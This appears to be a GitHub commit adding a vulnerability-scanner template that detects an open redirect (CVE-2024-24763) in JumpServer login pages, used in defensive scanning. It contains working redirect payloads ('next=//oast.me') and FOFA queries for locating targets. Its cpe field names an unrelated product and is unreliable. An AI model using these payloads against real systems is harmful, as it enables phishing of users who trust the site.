Create CVE-2024-24763.yaml

main
Ritik Chaddha 2024-08-01 14:07:55 +05:30 committed by GitHub
parent dde3a2faf4
commit 053a79c37b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 46 additions and 0 deletions

View File

@ -0,0 +1,46 @@
id: CVE-2024-24763
info:
name: JumpServer < 3.10.0 - Open Redirect
author: ritikchaddha
severity: medium
description: |
JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.
reference:
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5
- https://nvd.nist.gov/vuln/detail/CVE-2024-24763
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
cvss-score: 4.3
cve-id: CVE-2024-24763
cwe-id: CWE-601
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fit2cloud
product: jumpserver
fofa-query:
- title="JumpServer"
- title="jumpserver"
tags: cve2024,cve,jumpserver,redirect,fit2cloud,authenticated
http:
- raw:
- |
POST /{{paths}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
payloads:
paths:
- "core/auth/login/?next=//oast.me"
- "auth/login/?next=//oast.me"
- "login/?next=//oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'